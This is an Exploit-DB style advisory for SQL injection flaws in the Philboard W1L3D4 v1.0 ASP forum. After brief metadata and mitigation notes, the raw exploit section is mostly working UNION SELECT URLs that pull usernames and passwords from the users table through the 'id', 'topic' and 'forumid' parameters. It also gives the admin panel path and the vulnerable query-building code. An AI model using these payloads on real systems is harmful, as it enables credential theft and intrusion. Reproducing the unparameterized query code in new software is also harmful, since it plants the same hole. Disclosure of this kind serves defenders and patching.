Vendor: Philboard W1L3D4
By: U238
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Philboard W1L3D4
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:philboard:philboard_w1l3d4:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Philboard W1L3D4 v1.0 Multiple SQL Injection Vulnerabilities

Philboard W1L3D4 v1.0 is vulnerable to multiple SQL injection attacks. An attacker can exploit them by sending crafted input in the 'id' and 'recordnum' parameters of philboard_reply.asp and philboard_newtopic.asp, which the application places into its SQL queries. An attacker can also access the admin panel by sending malicious input to the 'forumid' parameter in philboard_newtopic.asp.

Mitigation:

Input validation should be used to prevent malicious SQL from reaching the application's queries. The application should also use parameterized queries.

Exploit-DB raw data:

Philboard W1L3D4 v1.0 Multiple SQL Injection Vulnerable

Author : U238 

mail   : setuid.noexec0x1[aq]hotmail[dot]com

webpage: http://noexec.blogspot.com


Script : http://www.aspindir.com/Goster/4703

Script2: http://rapidshare.de/files/39107179/philboardtrge.zip.html

-_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_


[0x1] Exploit:

http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,username,1,9,0,1,2+from+users

http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,password,1,9,0,1,2+from+users

*
http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,username,2,3,4,5,6+from+users

http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,password,2,3,4,5,6+from+users



-----------------------


http://localhost:2222/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,password,2,3,4,5+from+users

http://localhost:2222/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,username,2,3,4,5+from+users


-_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_-

[0x2] Admin Panel


target/philboard/philboard_admin.asp





[0x3] Error File : 

philboard_newtopic.asp

philboard_reply.asp


[0x3] Error Code : 


id = Request.QueryString("id")

recordnum = Request.QueryString("recordnum")

sql = "SELECT replies.*, forums.*, topics.locked FROM (forums INNER JOIN topics ON forums.forumid = topics.forum) INNER JOIN replies ON topics.id = replies.root WHERE replies.id = " & id




                                     [-] Patched ? [-] 

id = Request.QueryString("id")
IF Not IsNumeric(request.querystring("id")) THEN
Response.write "sql injection mu arıyon yawrucum,anam? !!" 
Response.End
END IF

* This code should be included in the application's error files.




------------------------------
[0x4] Greatz: The_BekiR - ka0x - Ferruh Mavituna - fahn - sersak

[0x5] U238 | Web - Designer Developer Solutions

-----------------------------

# milw0rm.com [2008-04-20]